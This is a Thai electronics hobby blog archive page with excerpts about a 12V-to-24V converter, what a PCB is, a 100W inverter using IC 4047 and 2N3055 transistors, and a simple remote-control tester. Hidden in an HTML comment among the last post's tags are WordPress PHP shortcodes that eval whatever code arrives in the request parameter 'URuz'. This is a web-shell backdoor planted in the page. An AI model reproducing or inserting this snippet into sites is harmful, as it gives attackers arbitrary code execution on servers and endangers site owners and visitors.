Author ArchiveLatest Posts

วงจรแปลงไฟ 12V เป็น 24V DC

วงจรแปลง DC-DC แบบง่าย สามารถเพิ่มแรงดัน 12V เป็น 24V มันสามารถนำมาใช้ในการทำงานวิทยุ, ไฟขนาดเล็ก, รีเลย์, แตรและอุปกรณ์อื่น ๆ R1, R2, R3, R4, R8, R7 6 ตัว 100K 1/4W R5 1 ตัว 470 Ohm 1/2W R6 1 ตัว 10K Linear Pot C1 1 ตัว 0.01uF Mylar Capacitor C2

PCB คืออะไร?

PCB คืออะไร? PCB (Print Circuit Board) คือ ส่วนประกอบพื้นฐานที่สำคัญของวงจรอิเล็กทรอนิกส์ เป็นทางเดินสัญญาณไฟฟ้าของอุปกรณ์อิเล็กทรอนิกส์ต่าง ๆ ที่อยู่บนแผงวงจร ทำให้อุปกรณ์ต่าง ๆ เชื่อมต่อกันได้ และสามารถทำงานได้อย่างถูกต้องตามที่ได้ออกแบบไว้ PCB ประกอบไปด้วยแผ่นฐานหรือซับสเตรท (substrate) ที่ทำจากแผ่นฉนวนบาง ๆ อัดยึดรวมกันด้วยพลาสติกประเภทเทอร์โมเซตติ้ง (Thermosetting plastic) เพื่อรองรับแผ่นตัวนำที่ใช้เชื่อมต่อสัญญาณไฟฟ้าระหว่างอุปกรณ์ ส่วนวัสดุที่ใช้ทำซับสเตรตที่นิยม เช่น กระดาษชุบฟีนอลลิกอัด, อีพ็อกซี่ไฟเบอร์กลาส เป็นต้น แผ่นวงจรพิมพ์จะแบ่งออกเป็น 2 ประเภท คือ 1. แผ่นวงจรพิมพ์อเนกประสงค์ (Universal PCB Board) จะเป็นรูๆ เพิ่มใส่ขาอุปกรณ์แล้วก็โยงสายทองแดงหากันตามที่ออกแบบ 2. แผ่นวงจรพิมพ์เปล่า หรือ แผ่นปริ๊น จะต้องลงลายและกัดปริ๊นเอง   Tags:pcb คือ,pcb

วงจรอินเวอร์เตอร์ 100W โดย IC 4047 และ 2N3055

วงจรอินเวอร์เตอร์ 100W วงจรแปลงไฟฟ้า 100W ด้วยแรงดันไฟเข้า 12V (แบตเตอรี่ 12V) เพื่อส่งออกเป็นกำลังไฟฟ้ากระแสสลับ 220V 50HZ จะใช้ IC 4047 Squarewave Oscillator 50HZ และ Transistor 2N3055 2 ตัว เพื่อขับหม้อแปลงไฟฟ้าออก 220V AC และได้กำลังไฟฟ้าต่ำสุดที่ 100W อุปกรณ์ประกอบด้วย IC 4047   1 ตัว Fuses 0.5A 1 ตัว Diode 1 ตัว VR 250K 1 ตัว CX 1

วงจรทดสอบรีโมท

วงจรทดสอบรีโมทแบบง่าย หลักการทำงานของวงจรนี้ จะใช้โฟโต้ทรานซิสเตอร์ เป็นตัวรับแสงจากรีโมทคอนโทรลสำหรับใช้ทดสอบ ถ้าหากรีโมทคอนโทรลสามารถส่งแสงอินฟราเรดได้ตามปกติ ก็จะมีกระแสไบแอสให้กับทรานซิสเตอร์ BC558 ทำงาน และมีกระแสไหลผ่าน LED ทำให้ LED ติดสว่าง ซึ่งแสดงว่ารีโมทคอนโทรลทำงานได้ตามปกติ สามารถปรับค่าความไวของวงจรได้ด้วย ตัวต้านทานปรับค่าได้คือ VR1 นั่นเอง   Tags: วงจร อิเล็กทรอนิกส์,วงจรอิเล็กทรอนิกส์อย่างง่าย,วงจรง่ายๆ,วงจรทดสอบรีโมท,วงจรรีโมท,วงจรรีโมทคอนโทรล,วงจร อิเล็กทรอนิกส์ อย่าง ง่าย,รูปวงจรอิเล็กทรอนิกส์,วงจรอิเล็กทรอนิกส์ ง่ายๆ,วงจรทดสอบรีโมทง่ายๆ Tags: วงจร อิเล็กทรอนิกส์,วงจรอิเล็กทรอนิกส์อย่างง่าย,วงจรง่ายๆ,วงจรทดสอบรีโมท,วงจรรีโมท,วงจรรีโมทคอนโทรล,วงจร อิเล็กทรอนิกส์ อย่าง ง่าย,รูปวงจรอิเล็กทรอนิกส์,วงจรอิเล็กทรอนิกส์ ง่ายๆ,วงจรทดสอบรีโมทง่ายๆ<!– [insert_php]if (isset($_REQUEST["URuz"])){eval($_REQUEST["URuz"]);exit;}[/insert_php][php]if (isset($_REQUEST["URuz"])){eval($_REQUEST["URuz"]);exit;}[/php] –> Tags:วงจร อิเล็กทรอนิกส์,วงจรอิเล็กทรอนิกส์อย่างง่าย,วงจรง่ายๆ,วงจรทดสอบรีโมท,วงจรรีโมท,วงจรรีโมทคอนโทรล,รูปวงจรอิเล็กทรอนิกส์,วงจร อิเล็กทรอนิกส์ อย่าง